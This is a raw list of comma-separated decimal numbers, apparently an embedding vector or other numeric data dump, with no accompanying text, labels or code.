-0.0019014549907296896, -0.0024697864428162575, 0.0026083611883223057, 0.019014550372958183, -0.01357680931687355, -0.0055605280213057995, -0.009121370501816273, -0.010615872219204903, -0.009914228692650795, 0.001174376462586224, 0.011787617579102516, -0.026087120175361633, -0.005721906200051308, 0.012271751649677753, 0.030423279851675034, 0.01786385476589203, -0.0061639416962862015, 0.002759214723482728, 0.0011936717201024294, 0.03575577214360237, 0.0002999527787324041, -0.028963860124349594, -0.006627026479691267, 0.025960825383663177, -0.002343490719795227, -0.024220747873187065, 0.026409877464175224, 0.026297613978385925, 0.022663097828626633, 0.015758922323584557, -0.009612521156668663, 0.004090583883225918, 0.0026855419855564833, -0.016320237889885902, -0.027027323842048645, -0.023813793435692787, 0.002280342625454068, 0.019253108650445938, 0.002969707828015089, 0.0009402028517797589, 0.009886162355542183, 0.014748554676771164, -0.018214676529169083, 0.002678525634109974, -0.001454157056286931, 0.005872759502381086, 0.01672719046473503, 0.0012147210072726011, -0.02234034240245819, -0.010510625317692757, 0.025132885202765465, -0.004304585512727499, -0.004273011349141598, 0.0008937189122661948, -0.021863223984837532, 0.02840254455804825, 0.0028293791692703962, -0.016853487119078636, 0.006023612804710865, 0.027350079268217087, -0.0017979624681174755, 0.01330316811800003, -0.03230368718504906, -0.009009107947349548, -0.0013471563579514623, -0.004395799245685339, 0.027364112436771393, -0.008854745887219906, -0.014608225785195827, 0.03816942870616913, -0.014334584586322308, -0.019786357879638672, 0.022985855117440224, -0.034240223467350006, 0.021344007924199104, 0.02354716882109642, 0.021863223984837532, -0.018944386392831802, -0.027981558814644814, -0.007212899159640074, -0.0025697709061205387, -0.009731801226735115, -0.026199383661150932, 0.0012278768699616194, 0.014930982142686844, 0.002650459762662649, 0.004416848532855511, 0.006556862499564886, -0.01385045051574707, -0.012159489095211029, -0.029833899810910225, -0.018312906846404076, -0.00017563023720867932, 0.007661951705813408, -0.009444126859307289, -0.02051606774330139, 0.0035362853668630123, -0.017541097477078438, 0.021554501727223396, 0.022803427651524544, 0.022171948105096817, 0.006837519817054272, -0.00862320326268673, 0.00794962514191866, 0.03258434310555458, -0.01690961793065071, 0.01742883399128914, 0.004146715626120567, 0.0009051206288859248, -0.021484335884451866, -0.021512402221560478, 0.02391202375292778, 0.0038099263329058886, -0.013183888979256153, 0.01379431877285242, 0.006069219671189785, 0.018060313537716866, 0.023350710049271584, -0.0009323093690909445, -0.004890458192676306, -0.0032854476012289524, 0.006483189761638641, -0.007872444577515125, 0.019379405304789543, 0.0031135447788983583, -0.009086288511753082, 0.001738322782330215, -0.008974025957286358, -0.0005086918245069683, 0.011043875478208065, -0.00018045403703581542, 0.012398048304021358, 0.03454894572496414, 0.01262958999723196, -0.0055991183035075665, -0.004350192379206419, 0.015730855986475945, 0.0026399351190775633, -0.00313459406606853, -0.014369667507708073, 0.025203049182891846, -0.0035520722158253193, -0.01658686250448227, 0.0072479816153645515, -0.007577754091471434, 0.01432756893336773, 0.015394067391753197, -0.008293431252241135, -0.028444644063711166, -0.009633570909500122, 0.010601839050650597, -0.012391031719744205, -0.0006367418682202697, -0.008321496658027172, 0.0033678908366709948, -0.0006257786881178617, 0.03137751668691635, -0.005679807625710964, -0.012215620838105679, -0.022354375571012497, 0.015772955492138863, -0.0314897783100605, 0.007142735179513693, -0.03452087938785553, 0.011135089211165905, -0.009493242017924786, 0.01836903765797615, 0.010005442425608635, -0.026760699227452278, 0.012054242193698883, 0.025455640628933907, -0.02318231388926506, 0.01585715264081955, -0.021694829687476158, -0.001852339948527515, 0.034829605370759964, 0.0013997795758768916, -0.0255538709461689, -0.007026963867247105, 0.0001984336704481393, 0.0027679852209985256, 0.004188814200460911, 0.04588751122355461, 0.010896530002355576, -0.014902916736900806, 0.02631164714694023, -0.0013068118132650852, 0.010559740476310253, -0.0015690511791035533, 0.00013769761426374316, -0.005862234625965357, 0.014320552349090576, -0.004174781031906605, 0.03443668410181999, 0.029497109353542328, -0.015057277865707874, -0.015141475945711136, 0.007139226887375116, -0.011549058370292187, 0.0021066858898848295, 0.011927946470677853, 0.0014103042194619775, 0.00957042258232832, -0.0066831582225859165, -0.02274729497730732, -0.009409044869244099, 0.035334788262844086, 0.006753322668373585, -0.033482447266578674, 0.00695329112932086, -0.0022996379993855953, -0.016193941235542297, -0.0017190275248140097, -0.015506329946219921, 0.0003306496946606785, 0.004059010185301304, 0.016502665355801582, 0.011071940883994102, 0.017653360962867737, 0.024304945021867752, 0.0043852743692696095, -0.003015314694494009, 0.00947920884937048, -0.0060271210968494415, -0.008882812224328518, -0.005578069016337395, 0.03443668410181999, -0.02295778878033161, -0.0004679087724070996, -0.01088249683380127, -0.004708030726760626, 0.004672948271036148, 0.003823959268629551, -0.013555760495364666, -0.03151784464716911, 0.00735322805121541, 0.015113409608602524, -0.022031618282198906, 0.018425168469548225, -0.008174151182174683, 0.0034450716339051723, 0.012243686243891716, -0.01177358441054821, -0.0056517417542636395, -0.00935291312634945, -0.011759552173316479, 0.00997035950422287, -0.015941349789500237, -0.00044510536827147007, -0.007451458368450403, -0.011640272103250027, -0.02165273018181324, 0.01357680931687355, -0.009731801226735115, 0.009184518828988075, -0.03163010627031326, 0.01159115694463253, 0.05871356278657913, 0.03721519187092781, -0.0007459351909346879, 0.020403804257512093, 0.03050747700035572, 0.017078012228012085, 0.002227719407528639, 0.012615557760000229, 0.0008459194214083254, -0.0024136549327522516, -0.01588521897792816, -0.012278768233954906, -0.01512744277715683, -0.0063077788800001144, -0.008447792381048203, -0.021849190816283226, 0.003785368986427784, 0.0059885308146476746, 0.04271608218550682, 0.01669912412762642, -0.01570279151201248, 0.01916891150176525, -0.011275417171418667, 0.012734836898744106, 0.01312074065208435, 0.019379405304789543, -0.03648548200726509, 0.0029381338972598314, -0.004862392321228981, 0.021442238241434097, -0.013471563346683979, 0.01405392773449421, -0.008244316093623638, -0.0016716666286811233, -0.015730855986475945, -0.015464231371879578, 0.01070006936788559, 0.0056061348877847195, 0.03749585151672363, -0.00667964993044734, 0.009654619731009007, -0.01672719046473503, 0.014103042893111706, -0.00545878941193223, -0.00120770453941077, -0.02781316451728344, -0.013092675246298313, 0.015983447432518005, -0.0026469517033547163, 0.009310814552009106, -0.008454808965325356, -0.014257404021918774, 0.0385623499751091, -0.016095710918307304, 0.02493642456829548, -0.026508105918765068, 0.013204938732087612, 0.02088092267513275, -0.0015857152175158262, 0.028346413746476173, -0.020151212811470032, 0.027574606239795685, -0.01030013244599104, -0.024136550724506378, 0.008202217519283295, 0.005490363575518131, -0.003397710621356964, -0.008974025957286358, 0.0004308532224968076, -0.000826185685582459, -0.006641059648245573, 0.012187554500997066, 0.02019331231713295, 0.009233633987605572, -0.01975829154253006, 0.0054693142883479595, -0.0019593406468629837, 0.0022943755611777306, 0.019674094393849373, -0.0025697709061205387, -0.0037116962485015392, 0.01738673634827137, 0.018383070826530457, -0.0005262329359538853, 0.01928117498755455, -0.01060885563492775, 0.006886634975671768, 0.004451930522918701, 0.025638068094849586, 0.011857782490551472, 0.003213529009371996, -0.001476083416491747, 0.009366946294903755, 0.02587662823498249, -0.022438572719693184, -0.025862595066428185, 0.01571682281792164, -0.02026347629725933, 0.017695458605885506, -0.028991926461458206, -0.011485910974442959, -0.024318978190422058, 0.010510625317692757, 0.018130479380488396, -0.025090785697102547, -0.000501675414852798, 0.001470821094699204, 0.011057907715439796, 0.005918366368860006, 0.016278138384222984, -0.020347673445940018, -0.014692423865199089, -0.01350664533674717, 0.025960825383663177, -0.001619043294340372, 0.03320179134607315, -0.01149994321167469, 0.005886792205274105, -0.03755198046565056, -0.006265680305659771, -0.012699754908680916, 0.016320237889885902, 0.016923651099205017, 0.00813205260783434, -0.00735322805121541, 0.0245294701308012, 0.012208604253828526, 0.0033222839701920748, -0.005020262207835913, 0.00120770453941077, -0.006669125519692898, 0.0036274990998208523, 0.021414171904325485, -0.012096340768039227, -0.009886162355542183, -0.010461511090397835, 0.01470645610243082, 0.00011610014189500362, 0.0034626126289367676, -0.022185981273651123, -0.002706591272726655, 0.024248814210295677, 0.010587806813418865, -0.009773899801075459, -0.018607595935463905, -0.017218342050909996, 0.0020768658723682165, 0.02124577760696411, 0.013127757236361504, -0.0017707737861201167, 0.01518357452005148, -0.005385117139667273, -0.0028416577260941267, 0.01968812756240368, -0.00997035950422287, -0.011436795815825462, -0.02099318616092205, -0.0075005735270679, -0.008026806637644768, -0.00460278382524848, 0.00033700832864269614, -0.019491666927933693, 0.019000517204403877, -0.009303797967731953, 0.0028293791692703962, 0.005202689673751593, 0.019631996750831604, -0.005213214084506035, 0.017807722091674805, -0.002832887228578329, 0.005307936109602451, -0.004644882865250111, -0.012847100384533405, -0.009858096949756145, 0.014467897824943066, -0.0055921017192304134, -0.012461195699870586, 0.023897990584373474, -0.023757662624120712, -0.029104189947247505, -0.009921245276927948, 0.0011278926394879818, -0.005999055225402117, 0.01658686250448227, -0.008328513242304325, -0.006265680305659771, -0.02069849520921707, 0.01761126145720482, 0.0036099578719586134, -0.004441406112164259, 0.0031363482121378183, 0.013261069543659687, -0.007167292293161154, 0.01253837626427412, 0.003346841549500823, -0.0010349247604608536, 0.009949310682713985, -0.011731485836207867, -0.014916949905455112, -0.016165874898433685, -0.008658286184072495, 0.000045058695832267404, -0.0006766478181816638, 0.00536757567897439, -0.0025241640396416187, 0.0029433961026370525, 0.02879546582698822, -0.0020996693056076765, 0.033510513603687286, -0.01651669666171074, 0.0019084714585915208, 0.013822385109961033, 0.013078642077744007, -0.0011550813214853406, 0.018355004489421844, -0.005848201923072338, -0.012215620838105679, 0.0019067173125222325, 0.006511255633085966, -0.02078269235789776, -0.014152158051729202, -0.005350034683942795, -0.03185463324189186, 0.004606292117387056, -0.005111475940793753, -0.000013841022337146569, -0.011415746062994003, 0.02158256620168686, -0.011317516677081585, 0.01782175526022911, -0.009921245276927948, -0.017555130645632744, -0.009093305096030235, 0.008111003786325455, 0.01543616596609354, -0.02227017842233181, -0.021414171904325485, -0.0014839768409729004, 0.0016681583365425467, -0.043726447969675064, -0.00505885249003768, 0.011977061629295349, 0.016376368701457977, 0.03449281305074692, 0.022438572719693184, 0.0043537006713449955, -0.028486743569374084, -0.0041642566211521626, 0.004855375736951828, 0.010559740476310253, 0.024810127913951874, -0.0021558008156716824, 0.009373962879180908, 0.00018670305144041777, 0.005111475940793753, -0.010433444753289223, -0.0006490205996669829, 0.002422425663098693, 0.00455717695876956, 0.020754626020789146, 0.004658915568143129, 0.019561832770705223, 0.005486855283379555, 0.015337935648858547, -0.0005104459705762565, 0.023673465475440025, 0.008812647312879562, -0.0021242268849164248, 0.011478894390165806, -0.010440461337566376, -0.004104617051780224, 0.010265050455927849, -0.006704207509756088, -0.01253837626427412, 0.000041221581341233104, -0.015772955492138863, 0.005813119933009148, 0.011212269775569439, 0.01939343847334385, 0.01895841769874096, -0.0074233924970030785, -0.00735322805121541, -0.0028135920874774456, -0.006939258426427841, -0.02069849520921707, -0.0061253514140844345, -0.012938314117491245, 0.005830660928040743, 0.0015646659303456545, 0.002422425663098693, 0.00365907303057611, 0.0020488002337515354, -0.008475858718156815, 0.013092675246298313, -0.009289765730500221, -0.008279398083686829, -0.009612521156668663, 0.02708345465362072, 0.006925225257873535, -0.004132682457566261, 0.0029661995358765125, -0.010587806813418865, -0.011261384934186935, 0.0026925585698336363, 0.007886477746069431, -0.00771808298304677, -0.014285470359027386, -0.007837362587451935, -0.006616502068936825, 0.01848130114376545, 0.003732745535671711, -0.004574718419462442, 0.0030521510634571314, -0.014916949905455112, -0.0036801223177462816, 0.028262216597795486, 0.005756988190114498, -0.010265050455927849, 0.011107022874057293, 0.019996851682662964, -0.003306496888399124, 0.003848516847938299, -0.009044189937412739, -0.030339082702994347, 0.0020716036669909954, 0.005188656505197287, -0.0008463579579256475, -0.0018540939781814814, 0.02569420076906681, -0.017990149557590485, -0.02398218959569931, 0.009233633987605572, -0.01964602991938591, -0.003373153042048216, 0.0019909145776182413, 0.004090583883225918, -0.008602154441177845, -0.013225987553596497, 0.014369667507708073, -0.015829086303710938, 0.015099376440048218, 0.020319607108831406, -0.017765624448657036, 0.005760496482253075, 0.0013252298813313246, -0.0014348617987707257, 0.0034064811188727617, -0.017078012228012085, -0.013282119296491146, 0.00605167867615819, -0.005234263371676207, -0.004518586676567793, 0.0030012817587703466, -0.01763932779431343, -0.01610974408686161, -0.005220230668783188, -0.01140872947871685, 0.018677759915590286, 0.016783323138952255, 0.009409044869244099, 0.044119369238615036, -0.010531675070524216, -0.000027188702006242238, 0.010461511090397835, 0.0010322935413569212, -0.020894955843687057, -0.009359929710626602, 0.021301908418536186, 0.02591872587800026, 0.009801965206861496, 0.006283221300691366, 0.0023575234226882458, -0.00006901325832586735, 0.0014357388718053699, -0.008917894214391708, -0.0020540624391287565, -0.0014752063434571028, 0.011675355024635792, 0.0034555962774902582, -0.0026259024161845446, -0.0026522139087319374, 0.00753565551713109, -0.007472507655620575, -0.002113702241331339, 0.005160591099411249, -0.01852339878678322, 0.03943238779902458, 0.01312074065208435, 0.01378028653562069, -0.016488632187247276, -0.0005402658134698868, -0.007507589645683765, 0.03294919803738594, 0.004816785454750061, -0.011780600994825363, -0.027855264022946358, -0.019407469779253006, -0.01866372860968113, -0.005637708585709333, 0.0018856680253520608, 0.01599748060107231, 0.0068655856885015965, 0.013618907891213894, -0.018677759915590286, -0.0006797175155952573, -0.004097600467503071, -0.003932713996618986, 0.013710121624171734, 0.01807434670627117, -0.023926056921482086, 0.015478264540433884, 0.022424539551138878, 0.007212899159640074, -0.010693052783608437, 0.03440861776471138, 0.00947920884937048, 0.010349247604608536, -0.02074059471487999, 0.013534710742533207, -0.01246821228414774, 0.005409674718976021, 0.02336474135518074, 0.011570108123123646, -0.007654935121536255, 0.020768659189343452, -0.0021189646795392036, 0.016123777255415916, -0.005756988190114498, 0.0033187756780534983, -0.021568533033132553, -0.004304585512727499, -0.005300919525325298, 0.009949310682713985, 0.010812332853674889, 0.01281201746314764, 0.018677759915590286, 0.005444756709039211, 0.004651898983865976, -0.02106335014104843, -0.00889684446156025, -0.007619852665811777, 0.0008542514406144619, 0.0127208037301898, 0.012517327442765236, -0.011324532330036163, -0.0012734837364405394, 0.012664672918617725, 0.011668338440358639, -0.0008560055866837502, 0.0002861391694750637, 0.008454808965325356, 0.012847100384533405, 0.0025487213861197233, 0.014334584586322308, 0.01731657236814499, -0.028879662975668907, 0.016741223633289337, 0.017905952408909798, -0.01891632005572319, 0.008223266340792179, 0.006100793834775686, 0.002355769509449601, 0.005834169220179319, -0.015323903411626816, -0.008763532154262066, -0.03261240944266319, -0.004087075591087341, -0.0007761935703456402, -0.005353542976081371, -0.008777565322816372, 0.00853198952972889, -0.009900195524096489, -0.009486225433647633, -0.013282119296491146, 0.002439966658130288, -0.002069849520921707, -0.003950254991650581, -0.0027767557185143232, 0.009507275186479092, -0.0016506173415109515, -0.007921559736132622, 0.008693368174135685, -0.027504440397024155, 0.02055816724896431, -0.026844896376132965, -0.021484335884451866, 0.0140890097245574, 0.01804628223180771, 0.03247208148241043, 0.015913283452391624, 0.020572198554873466, 0.007062045857310295, 0.002159309107810259, 0.01745690032839775, -0.0056131514720618725, -0.0042098634876310825, -0.022943755611777306, 0.011717453598976135, 0.010159803554415703, 0.016137810423970222, -0.012938314117491245, -0.009724784642457962, 0.01709204539656639, 0.00365907303057611, 0.0019575865007936954, -0.024445272982120514, -0.005364067852497101, -0.005665774457156658, 0.00327141466550529, -0.0080408388748765, -0.012636606581509113, -0.0016111498698592186, 0.00600607180967927, 0.010173836722970009, 0.008082937449216843, 0.007844379171729088, -0.00853198952972889, -0.0008279398316517472, -0.003830975852906704, -0.005160591099411249, 0.0024697864428162575, 0.0035134819336235523, -0.005735938902944326, 0.02551177330315113, -0.000017774065781850368, -0.01452402863651514, -0.02438914217054844, 0.010314165614545345, -0.01770949177443981, -0.0048659006133675575, 0.017583196982741356, -0.0039011400658637285, 0.013696089386940002, 0.0074304090812802315, 0.01312074065208435, -0.027055388316512108, 0.01877599023282528, 0.019674094393849373, 0.002657476346939802, -0.0018663727678358555, -0.0020312590058892965, -0.0023855892941355705, 0.04498940706253052, -0.012236669659614563, -0.008672318421304226, -0.0034117435570806265, 0.009156453423202038, -0.00118490110617131, 0.005967481527477503, 0.004329143092036247, -0.003785368986427784, 0.021919354796409607, -0.012271751649677753, 0.005451773293316364, -0.008847729302942753, 0.016895584762096405, -0.008952976204454899, -0.0203055739402771, -0.01301549468189478, 0.008181167766451836, 0.010545708239078522, 0.0185935627669096, -0.04167764633893967, -0.013078642077744007, -0.007837362587451935, -0.029244517907500267, -0.03707486391067505, 0.012033193372189999, 0.003585400292649865, 0.01305057667195797, -0.007167292293161154, -0.008546022698283195, -0.0024820652324706316, -0.004357208497822285, 0.007012930698692799, -0.0049430811777710915, 0.007654935121536255, -0.00834956206381321, 0.0072409650310873985, -0.026844896376132965, 0.009009107947349548, 0.0006056064157746732, -0.004837834741920233, -0.014860818162560463, -0.01811644621193409, 0.012840083800256252, 0.02048800140619278, -0.011478894390165806, 0.003694155253469944, -0.01436265092343092, 0.01763932779431343, 0.007998740300536156, 0.010959677398204803, 0.013218970969319344, 0.001704117632471025, -0.02459963597357273, 0.0032345785293728113, 0.009359929710626602, 0.02062833122909069, 0.007479524239897728, 0.008798614144325256, -0.02423478104174137, 0.006655092351138592, 0.011717453598976135, -0.0050483280792832375, 0.002587311901152134, 0.02865513786673546, 0.0062025319784879684, -0.021891290321946144, 0.005314952693879604, -0.01518357452005148, 0.005872759502381086, -0.012180537916719913, -0.005399149842560291, -0.014566127210855484, 0.003813434625044465, 0.0007262014551088214, -0.00469399755820632, -0.009830031543970108, -0.01902858354151249, 0.01599748060107231, 0.015408100560307503, 0.017527064308524132, -0.024150583893060684, 0.023954123258590698, -0.00025281106354668736, 0.008686351589858532, -0.014509996399283409, 0.0006757708033546805, 0.016320237889885902, -0.011359615251421928, 0.027911394834518433, 0.0010191377950832248, -0.002896035322919488, 0.003813434625044465, 0.006434074603021145, -0.01128243375569582, -0.0021277351770550013, -0.011661321856081486, -0.006395484320819378, -0.00695329112932086, 0.0005442125839181244, 0.018242741003632545, -0.04072341322898865, 0.002748690079897642, 0.004027436021715403, 0.0028293791692703962, 0.00709011172875762, -0.021891290321946144, -0.00853198952972889, -0.0024925898760557175, -0.001459419378079474, -0.04476488009095192, -0.03036714904010296, 0.015660692006349564, -0.015801019966602325, 0.005171115510165691, -0.006798929534852505, 0.00010031315468950197, -0.012496277689933777, -0.007998740300536156, 0.0074163759127259254, -0.004273011349141598, -0.0030293476302176714, -0.011633256450295448, 0.023785728961229324, -0.0002793419698718935, 0.0006393730291165411, 0.004634357988834381, 0.011977061629295349, 0.004879933316260576, 0.000649897672701627, -0.0017374457092955709, 0.004220387898385525, 0.0014576652320101857, -0.019435536116361618, -0.008882812224328518, -0.010833381675183773, 0.005188656505197287, 0.006886634975671768, -0.01463629212230444, -0.012033193372189999, -0.006248138844966888, 0.010931611992418766, 0.002599590690806508, 0.003369644982740283, 0.010293115861713886, 0.0033766613341867924, -0.006100793834775686, -0.011689387261867523, 0.007205883041024208, -0.004501045681536198, 0.01720430888235569, 0.008700384758412838, -0.007507589645683765, 0.02060026489198208, -0.015534396283328533, 0.019561832770705223, 0.011114039458334446, -0.011528009548783302, 0.010756201110780239, 0.01481871958822012, -0.0023294577840715647, -0.024445272982120514, -0.017232375219464302, -0.010272067040205002, -0.000649897672701627, 0.008426743559539318, -0.0014217059360817075, 0.0019312748918309808, 0.025525804609060287, 0.01647459901869297, 0.01244716253131628, 0.0012752377660945058, 0.006500730756670237, -0.013331234455108643, 0.01672719046473503, -0.0013120741350576282, -0.0030451344791799784, 0.015351968817412853, -0.011261384934186935, 0.01241208054125309, 0.005497380159795284, 0.027307981625199318, -0.008419726975262165, -0.010068589821457863, -0.02416461706161499, -0.009766883216798306, 0.008721433579921722, 0.01152099296450615, 0.0026522139087319374, 0.004304585512727499, -0.0020821283105760813, 0.009640587493777275, -0.015211639925837517, -0.017288506031036377, -0.0030539052095264196, -0.006581420078873634, -0.0006113072740845382, 0.009184518828988075, -0.009647604078054428, 0.0033556120470166206, 0.0029890029691159725, 0.0020663412287831306, 0.018088379874825478, 0.005251804832369089, -0.010384329594671726, 0.008426743559539318, -0.008910877630114555, -0.0019470618572086096, 0.039460454136133194, 0.010672003962099552, 0.005662266165018082, 0.011233318597078323, -0.026255514472723007, 0.012145455926656723, 0.011506959795951843, -0.019660063087940216, 0.010173836722970009, -0.02051606774330139, 0.00308898719958961, 0.03634515404701233, 0.000490273698233068, -0.01182971615344286, -0.02354716882109642, 0.0035994332283735275, -0.005490363575518131, -0.016207974404096603, 0.00012388400500640273, -0.01228578481823206, -0.005336001981049776, -0.0021294893231242895, 0.011850765906274319, -0.019744260236620903, -0.012271751649677753, -0.022873591631650925, 0.011977061629295349, 0.032893065363168716, -0.018691793084144592, 0.010538691654801369, 0.013162840157747269, -0.0019347830675542355, 0.016811387613415718, 0.011015809141099453, 0.010447477921843529, -0.0038450085557997227, -0.003697663312777877, -0.01884615607559681, -0.01585715264081955, -0.002376818796619773, -0.010749184526503086, -0.0063077788800001144, 0.006560370326042175, 0.007956641726195812, -0.013464546762406826, 0.01702188141644001, -0.003683630609884858, -0.000011052262379962485, 0.018102413043379784, -0.00762686925008893, -0.034352485090494156, 0.03230368718504906, 0.002354015363380313, 0.012391031719744205, -0.019786357879638672, 0.003683630609884858, -0.003743270179256797, -0.013955697417259216, -0.00013638203381560743, 0.005946432240307331, 0.035699643194675446, -0.021750960499048233, 0.004662423860281706, 0.014846784994006157, 0.012692738324403763, 0.017723524942994118, -0.009058223105967045, -0.01463629212230444, 0.0025469674728810787, 0.01651669666171074, -0.0031714304350316525, 0.006346369162201881, 0.0036555647384375334, 0.00825834833085537, 0.0009077517897821963, -0.003676614025607705, 0.0034468257799744606, -0.03073200397193432, 0.0005639463197439909, 0.003732745535671711, -0.0043922909535467625, 0.012362965382635593, -0.00024425977608188987, -0.004886949900537729, 0.005290395114570856, 0.012945329770445824, 0.019617963582277298, -0.017835788428783417, -0.017260439693927765, -0.003652056446298957, -0.005069377366453409, 0.004546652548015118, -0.0036099578719586134, 0.03370697423815727, 0.01073515135794878, 0.0015374772483482957, -0.006363910157233477, -0.019182944670319557, -0.02288762480020523, -0.008924910798668861, 0.006581420078873634, 0.005879776086658239, 0.007009422406554222, -0.00505885249003768, -0.028304316103458405, 0.02033364027738571, 0.011317516677081585, 0.008272381499409676, -0.011927946470677853, 0.03917979449033737, -0.004676456563174725, 0.01786385476589203, 0.0010270312195643783, -0.0012550655519589782, -0.008686351589858532, -0.0020505543798208237, 0.019702160730957985, -0.004199338611215353, -0.010124721564352512, 0.0025346886832267046, 0.018635662272572517, 0.00898805819451809, 0.0026364270597696304, 0.03797296807169914, -0.014930982142686844, -0.03443668410181999, 0.009612521156668663, 0.0014699440216645598, -0.002062833169475198, 0.01561859343200922, -0.009759866632521152, -0.03381923586130142, 0.008468842133879662, 0.01137364748865366, -0.0034555962774902582, 0.016783323138952255, -0.011927946470677853, -0.0033029885962605476, 0.0019575865007936954, 0.018130479380488396, 0.024655766785144806, -0.0018540939781814814, -0.01518357452005148, -0.0026767714880406857, 0.015801019966602325, -0.0037748441100120544, -0.004199338611215353, -0.0065393210388720036, 0.009654619731009007, 0.0018839138792827725, 0.0060201045125722885, -0.0050483280792832375, 0.007402343209832907, 0.004118649754673243, 0.01585715264081955, 0.0010059819323942065, 0.01914084516465664, -0.006876110099256039, -0.020614298060536385, 0.01862162910401821, 0.012475228868424892, 0.007542672101408243, 0.002001439221203327, 0.001641846727579832, 0.012664672918617725, -0.0140890097245574, 0.0036345154512673616, 0.020726561546325684, 0.016783323138952255, 0.031181056052446365, -0.0032801851630210876, -0.02220001257956028, 0.02457156963646412, 0.012278768233954906, -0.017260439693927765, -0.03766424581408501, 0.010447477921843529, -0.010854431428015232, -0.004037960898131132, -0.002343490719795227, -0.0028521823696792126, -0.005381608847528696, 0.026325680315494537, -0.008721433579921722, -0.018495334312319756, 0.011913913302123547, 0.005206197965890169, 0.014495963230729103, 0.006199024152010679, 0.005027278792113066, 0.023392807692289352, 0.007104144431650639, -0.004844851326197386, -0.01946360245347023, -0.01815854385495186, -0.008595137856900692, 0.02409445121884346, -0.0034134977031499147, 0.03064780682325363, -0.019267141819000244, 0.006984865292906761, -0.010903546586632729, -0.02234034240245819, 0.009366946294903755, -0.00759178726002574, 0.01742883399128914, -0.026662468910217285, -0.0006319180247373879, -0.010833381675183773, -0.013099691830575466, 0.00938799511641264, -0.02012314647436142, 0.01724640652537346, 0.0014173206873238087, 0.013646974228322506, 0.02740621194243431, -0.008075921796262264, 0.0072479816153645515, 0.013625924475491047, 0.020572198554873466, -0.009423078037798405, -0.007647918537259102, -0.013555760495364666, -0.011584141291677952, -0.0024645242374390364, 0.0298900306224823, 0.008181167766451836, 0.0032187914475798607, -0.010784266516566277, -0.010349247604608536, -0.004578226711601019, -0.008251332677900791, 0.0033082510344684124, 0.006834011524915695, 0.008574088104069233, -0.010868464596569538, 0.013254052959382534, 0.01825677417218685, -0.0127208037301898, 0.03328598663210869, 0.012671688571572304, 0.004522094968706369, 0.00957042258232832, -0.0032977263908833265, 0.025834528729319572, 0.024852227419614792, 0.0008178536663763225, 0.002222456969320774, 0.022045651450753212, -0.02774300053715706, 0.02019331231713295, 0.007675984408706427, 0.016825420781970024, 0.007233948912471533, -0.006802437826991081, 0.006704207509756088, -0.01033521443605423, -0.03334211930632591, -0.01939343847334385, 0.01782175526022911, -0.0024662783835083246, 0.0041642566211521626, -0.0015760676469653845, 0.00753565551713109, -0.010994760319590569, 0.00038108034641481936, -0.03320179134607315, 0.01971619389951229, 0.010461511090397835, -0.004051993601024151, 0.0019400453893467784, -0.0006990127149038017, 0.022971821948885918, 0.0026171316858381033, -0.004476488102227449, 0.03247208148241043, 0.018677759915590286, 0.009893178939819336, -0.003648548386991024, 0.01368907280266285, 0.0033591201063245535, 0.01581505313515663, -0.007907526567578316, -0.0056061348877847195, 0.009451143443584442, -0.00550439627841115, -0.004125666338950396, -0.009949310682713985, -0.013204938732087612, -0.0018277823692187667, -0.009963343851268291, -0.012847100384533405, 0.00519567308947444, 0.010363280773162842, 0.001442755339667201, 0.006476173177361488, -0.008167135529220104, -0.008321496658027172, -0.006791912950575352, -0.003583646146580577, 0.006146400701254606, -0.005806103348731995, -0.00035257605486549437, -0.00022266230371315032, 0.0185935627669096, 0.011492927558720112, 0.004104617051780224, -0.016895584762096405, 0.021372074261307716, -0.006946274545043707, 0.009823014959692955, -0.002206670120358467, -0.004771178588271141, -0.010110688395798206, -0.007367261219769716, 0.0009533586562611163, -0.005742955487221479, -0.008468842133879662, -0.012636606581509113, -0.01909874752163887, 0.008567072451114655, 0.009766883216798306, -0.0009296781499870121, -0.0015690511791035533, 0.033005330711603165, 0.012454179115593433, -0.022761328145861626, -0.005939415656030178, 0.023743629455566406, 0.019982818514108658, 0.01968812756240368, 0.00046922435285523534, -0.00853198952972889, 0.01987055502831936, 0.004241437651216984, -0.0003986214578617364, 0.013275102712213993, -0.016488632187247276, 0.008981041610240936, 0.009493242017924786, 0.004360716789960861, 0.00844077579677105, 0.028276249766349792, -0.005848201923072338, -0.010833381675183773, 0.004094092175364494, 0.02539950981736183, -0.02459963597357273, -0.0021452761720865965, -0.004472979810088873, -0.0072549981996417046, -0.005893808789551258, 0.023266512900590897, 0.0006753322668373585, 0.013366316445171833, -0.009500258602201939, 0.004932556767016649, -0.01359785906970501, 0.018397103995084763, 0.01152099296450615, 0.007928576320409775, -0.003441563341766596, -0.0008112757932394743, 0.0014734521973878145, -0.00036682820064015687, 0.011598173528909683, 0.0281780194491148, 0.019084714353084564, 0.004781702999025583, -0.011913913302123547, -0.01968812756240368, 0.022761328145861626, -0.011478894390165806, -0.032640475779771805, -0.018874220550060272, 0.017484966665506363, -0.004792227875441313, 0.008840713649988174, 0.004258978646248579, 0.019435536116361618, 0.007005914580076933, 0.012419097125530243, -0.007886477746069431, -0.0067217485047876835, -0.008019790053367615, 0.0074163759127259254, 0.027111520990729332, -0.01079128310084343, 0.005202689673751593, -0.0136329410597682, -0.029216451570391655, 0.01290323119610548, -0.001796208438463509, -0.003964288160204887, -0.010068589821457863, -0.003988845739513636, -0.002273326274007559, -0.030451346188783646, -0.0030995120760053396, 0.01902858354151249, 0.0077531649731099606, 0.010187869891524315, -0.01793401874601841, 0.02532934583723545, -0.012222636491060257, -0.000985809718258679, 0.007198866456747055, 0.0001475644821766764, -0.019126811996102333, -0.01822870783507824, -0.004213371779769659, 0.007788247428834438, -0.00035411090357229114, 0.012026176787912846, -0.006693683099001646, 0.004023927729576826, 0.025034654885530472, -0.00036112734233029187, 0.010749184526503086, 0.0023505070712417364, -0.0014585423050448298, -0.006620010361075401, -0.02904805727303028, -0.013043560087680817, 0.004992196336388588, 0.020291542634367943, 0.010938628576695919, -0.0014664357295259833, -0.007058537565171719, 0.0177936889231205, -0.013148806989192963, -0.002936379751190543, 0.025413542985916138, -0.02069849520921707, -0.02904805727303028, -0.004441406112164259, 0.0017418309580534697, -0.01695171743631363, 0.00907927192747593, 0.01470645610243082, 0.007062045857310295, -0.027546539902687073, 0.008686351589858532, 0.0245294701308012, -0.00029096295475028455, -0.009549373760819435, -0.011135089211165905, 0.02587662823498249, -0.008616187609732151, 0.007837362587451935, -0.015646658837795258, 0.02329457737505436, -0.026353744789958, -0.019730227068066597, -0.00043962374911643565, 0.0015506329946219921, 0.016306204721331596, -0.008637236431241035, 0.00740935979411006, 0.006444599479436874, -0.004297568928450346, 0.009521307423710823, -0.008251332677900791, 0.025385476648807526, -0.010510625317692757, 